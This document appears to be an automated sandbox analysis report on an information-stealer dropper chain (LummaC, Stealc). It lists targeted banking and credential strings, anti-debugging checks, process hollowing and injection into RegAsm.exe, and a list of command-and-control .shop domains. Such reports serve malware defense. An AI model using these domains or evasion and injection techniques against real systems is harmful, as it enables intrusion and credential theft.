Source: JavvvUmar.exe, 0000001C.00000003.2402136887.000000000D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: JavvvUmar.exe, 0000001C.00000002.3272158014.000000000087E000.00000002.00000001.01000000.0000001B.sdmp	Binary or memory string: A)"AimportBackup.android.cache.gradleHisuiteJetBrainsSidify Music ConverterScreenstoragedollarcryptphantomWindows Server 2012 %wSdragon.exeVMwareWhatsApp\Local StorageNichromeMetroVALORANTRiot GameshtxrbUARTokenBroker.rtfvivaldi.exepeuDropboxElectronOpera UnknowncodegameejbalbakoplchlghecdalmeeeajnimhmOperaWeb DataOpera Software\Opera Crypto Stableholdmedia_cacheSweetLabs App PlatformTwitch StudiouniatomtrxdaiMetaMaskFACEITpythonpipSystem Profile.txt.docEMPRESSinkscapeGamesexodusljfoeinjpaedjfecbmggjgodbgkmjkjkBraavos Smart WalletHD-PlayerAutoHotkeyProcess Hacker 2AdbAppControlbtchpglfhgfnhbgpjdenjgmdgoeiappaflnfhmfendgdocmcbmfikdcogofphimnknoPower BI Desktop Store AppWebExNVIDIA Corporationkeypasssending
Source: JavvvUmar.exe, 0000001C.00000003.2402136887.000000000D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: JavvvUmar.exe, 0000001C.00000003.2402136887.000000000D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696497155
Source: needmoney.exe, 00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2232110837.0000000000401000.00000020.00000001.01000000.0000001C.sdmp	Binary or memory string: xmlphpvlczpl wpl xpacketimport hrefXML:NAMESPACEaid DOCTYPE ELEMENT ENTITY -- <mdb:mork:zAFDR aom saved from url=(-->xmlns=jobwmlRDFnzbsvgkmlgpxCaRxslJDFrssRSStagTAGXMIlmxloclogIMGtmxosmX3DVERCFLRCCncxxbkSCFrtcpseSDOmapnviofcasxdivLogopmlsmilrootpgmlxfdfXFDLBASEtei2xbeljnlpdgmlfeedFEEDinfobeancasevxmlsesxnotesitetasklinkxbrlGAEBXZFXFormqgisSMAIHDMLjsonpsplbodyheadmetadictdocuembedplistTEI.2xliffformsQBXMLTypeseaglehtml5myapptablestyleentrygroupLXFMLwindowdialogSchemaschemacommonCanvaslayoutobjectFFDataReporttaglibARCXMLgnc-v2modulerobloxXDFV:4Xara3DLayoutRDCManattachwidgetreportSchemewebbuyloaderdeviceRDF:RDFweb:RDFoverlayprojectProjectabiwordxdp:xdpsvg:svgCOLLADASOFTPKGfo:rootlm:lmxarchivecollagelibraryHelpTOCpackagesiteMapen-noteFoundryweblinkReportssharingWebPartTestRunpopularsnippetwhpropsQBWCXMLcontentkml:kmlSDOListkDRouteFormSetactionslookupssectionns2:gpxPaletteCatalogProfileTreePadMIFFileKeyFilepayloadPresetsstringsdocumentDocumentNETSCAPEmetalinkresourcenewsItemhtmlplusEnvelopeplandatamoleculelicensesDatabasebindingsWorkbookPlaylistBookFileTimeLinejsp:rootbrowsersfotobookMTSScenemessengercomponentc:contactr:licensex:xmpmetadiscoveryERDiagramWorksheetcrickgridHelpIndexWinampXMLrecoIndexTomTomTocen-exportAnswerSetwinzipjobmuseScorePHONEBOOKm:myListsedmx:EdmxYNABData1workspacePlacemarkMakerFileoor:itemsscriptletcolorBookSignaturexsd:schemadlg:windowFinalDraftVirtualBoxTfrxReportVSTemplateWhiteboardstylesheetBurnWizarddictionaryPCSettingsRedlineXMLBackupMetaxbrli:xbrlFontFamilys:WorkbookFictionBookdia:diagramdefinitionsNmfDocumentSnippetRootSEC:SECMetanet:NetfileCustSectionDieCutLabelPremierDataUserControljsp:includess:Workbookapplicationjsp:useBeancfcomponentparticipantSessionFilejasperReporthelpdocumentxsl:documentxsl:templatePremiereDataSettingsFileCodeSnippetsFileInstancetpmOwnerDataDataTemplateProject_DataTfrReportBSAnote:notepadFieldCatalogUserSettingsgnm:WorkbookLIBRARY_ITEMDocumentDatamso:customUIpicasa2albumrnpddatabasepdfpreflightrn-customizecml:moleculemuveeProjectRelationshipsVisioDocumentxsl:transformD:multistatusKMYMONEY-FILEBackupCatalogfile:ManifestPocketMindMapDiagramLayoutannotationSetLEAPTOFROGANSpublic:attachsoap:EnvelopepersistedQuerymx:ApplicationOverDriveMediaasmv1:assemblyHelpCollectionQvdTableHeaderSCRIBUSUTF8NEWw:wordDocumentPADocumentRootConfigMetadataBorlandProjectDTS:ExecutableMMC_ConsoleFilelibrary:libraryglade-interfacerg:licenseGroupdisco:discoveryAdobeSwatchbookaudacityprojectoffice:documentCoolpixTransfersqueeze_projectwirelessProfileProjectFileInfowsdl:definitionsScrivenerProjectfulfillmentTokenkey:presentationdynamicDiscoverylibrary:librariesClickToDvdProjectDataCladFileStorechat_api_responseMyApplicationDataKeyboardShortcutsDeepBurner_recordXmlTransformationdata.vos.BudgetVOIRIDASCompositionpresentationClipsoor:component-datalibraryDescriptionPowerShellMetadataResourceDictionaryxsf:xDocumentClassoffice:color-tableVisualStudioProjectActiveReportsLayoutwap-provisioningdocAfterEffectsProjectoor:component-sch
Source: penis.exe, 00000018.00000002.2227774761.0000000003270000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe`,
Source: svchost015.exe, 0000001D.00000002.2838666402.0000000027160000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: JavvvUmar.exe, 0000001C.00000003.2402136887.000000000D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: file.exe, 00000000.00000002.1404961559.0000000000A70000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.1434494867.0000000000410000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.1449110960.0000000000410000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: Hkbsse.exe, 00000016.00000002.3821765815.0000000001334000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWjt
Source: svchost015.exe, 0000001D.00000002.2838666402.0000000027160000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: JavvvUmar.exe, 0000001C.00000003.2402136887.000000000D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_052A03DF rdtsc

0_2_052A03DF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_06873ED8 LdrInitializeThunk,

12_2_06873ED8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_00407B01 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

16_2_00407B01

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_0024645B mov eax, dword ptr fs:[00000030h]	9_2_0024645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_0024A1C2 mov eax, dword ptr fs:[00000030h]	9_2_0024A1C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0041914C mov eax, dword ptr fs:[00000030h]	16_2_0041914C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_004114A6 mov ecx, dword ptr fs:[00000030h]	16_2_004114A6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_0041EFD8 GetProcessHeap,

16_2_0041EFD8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00407B01 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_00407B01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00407C63 SetUnhandledExceptionFilter,	16_2_00407C63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00407D75 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_00407D75
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0040DD78 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_0040DD78

Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 4512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: needmoney.exe PID: 7808, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\stealc_default2[1].exe, type: DROPPED

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Memory allocated: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2550000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe

Code function: 10_2_031F24C9 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,

10_2_031F24C9

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2550000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: RegAsm.exe, 00000010.00000002.2056471740.0000000000479000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: reinforcenh.shop
Source: RegAsm.exe, 00000010.00000002.2056471740.0000000000479000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: stogeneratmns.shop
Source: RegAsm.exe, 00000010.00000002.2056471740.0000000000479000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: fragnantbui.shop
Source: RegAsm.exe, 00000010.00000002.2056471740.0000000000479000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: drawzhotdog.shop
Source: RegAsm.exe, 00000010.00000002.2056471740.0000000000479000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: vozmeatillu.shop
Source: RegAsm.exe, 00000010.00000002.2056471740.0000000000479000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: offensivedzvju.shop
Source: RegAsm.exe, 00000010.00000002.2056471740.0000000000479000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ghostreedmnu.shop
Source: RegAsm.exe, 00000010.00000002.2056471740.0000000000479000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: gutterydhowi.shop
Source: RegAsm.exe, 00000010.00000002.2056471740.0000000000479000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: lootebarrkeyn.shop
Source: LummaC222222.exe, 0000002A.00000003.2522451460.0000000000E28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: covvercilverow.shop
Source: LummaC222222.exe, 0000002A.00000003.2522451460.0000000000E28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: surroundeocw.shop
Source: LummaC222222.exe, 0000002A.00000003.2522451460.0000000000E28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: abortinoiwiam.shop
Source: LummaC222222.exe, 0000002A.00000003.2522451460.0000000000E28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: pumpkinkwquo.shop
Source: LummaC222222.exe, 0000002A.00000003.2522451460.0000000000E28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: priooozekw.shop
Source: LummaC222222.exe, 0000002A.00000003.2522451460.0000000000E28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: deallyharvenw.shop
Source: LummaC222222.exe, 0000002A.00000003.2522451460.0000000000E28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: defenddsouneuw.shop
Source: LummaC222222.exe, 0000002A.00000003.2522451460.0000000000E28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: racedsuitreow.shop

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe

Section unmapped: C:\Users\user\AppData\Local\Temp\svchost015.exe base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BED008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 434000
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 436000
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 4DC000
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 8F9008
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 41E000
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 42B000
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 63E000
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2550000
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2551000
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 258E000
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 259E000
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25A1000
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2635008
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 60B008

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user\AppData\Local\Temp\1000002001\gold.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe "C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe "C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe "C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe "C:\Users\user\AppData\Local\Temp\1000254001\penis.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe "C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000285001\2.exe "C:\Users\user\AppData\Local\Temp\1000285001\2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe "C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe "C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe "C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe "C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\u3uP67496d.exe "C:\Users\user\AppData\Roaming\u3uP67496d.exe"
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Process created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Process created: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe "C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe"
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
